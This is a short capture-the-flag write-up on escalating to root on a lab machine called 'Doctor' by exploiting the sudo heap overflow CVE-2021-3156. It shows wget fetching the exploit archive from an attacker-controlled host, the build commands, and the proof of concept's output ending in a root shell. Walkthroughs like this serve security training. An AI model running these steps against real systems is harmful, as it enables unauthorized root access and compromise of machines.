InfoSec LAB

Doctor_Privilege_Escalation_4

Created: 2 min read

CVE-2021-3156

PEAS discovered that the target system is vulnerable to CVE-2021-3156

a vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. Using CWE to declare the problem leads to CWE-122. A heap overflow condition is a buffer overflow, where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted is confidentiality, integrity, and availability.

exploit (sudo baron samedit)

While there are many exploits available for CVE-2021-3156, this one is very reliable

Exploitation

web@doctor:/dev/shm$ wget http://10.10.14.9/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156
--2023-03-09 19:44:40--  http://10.10.14.9/kernelbuster/CVE-2021-3156.tar.gz
connecting to 10.10.14.9:80... connected.
HTTP request sent, awaiting response... 200 OK
length: 24435 (24K) [application/gzip]
saving to: ‘CVE-2021-3156.tar.gz’
 
CVE-2021-3156.tar.gz 100%[===================>]  23,86K  --.-KB/s    in 0,03s   
 
2023-03-09 19:44:40 (784 KB/s) - ‘CVE-2021-3156.tar.gz’ saved [24435/24435]

Delivery complete

web@doctor:/dev/shm/CVE-2021-3156$ make
rm -rf libnss_X
mkdir libnss_X
gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c
gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c

Compile

web@doctor:/dev/shm/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 1
./sudo-hax-me-a-sandwich 1
 
** CVE-2021-3156 PoC by blasty <peter@haxx.in>
 
using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
** pray for your rootshell.. **
[+] bl1ng bl1ng! We got it!
# whoami
whoami
root
# hostname
hostname
doctor
# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:eb:28 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.209/24 brd 10.10.10.255 scope global ens160
       valid_lft forever preferred_lft forever
    inet6 dead:beef::250:56ff:feb9:eb28/64 scope global dynamic mngtmpaddr 
       valid_lft 86396sec preferred_lft 14396sec
    inet6 fe80::250:56ff:feb9:eb28/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks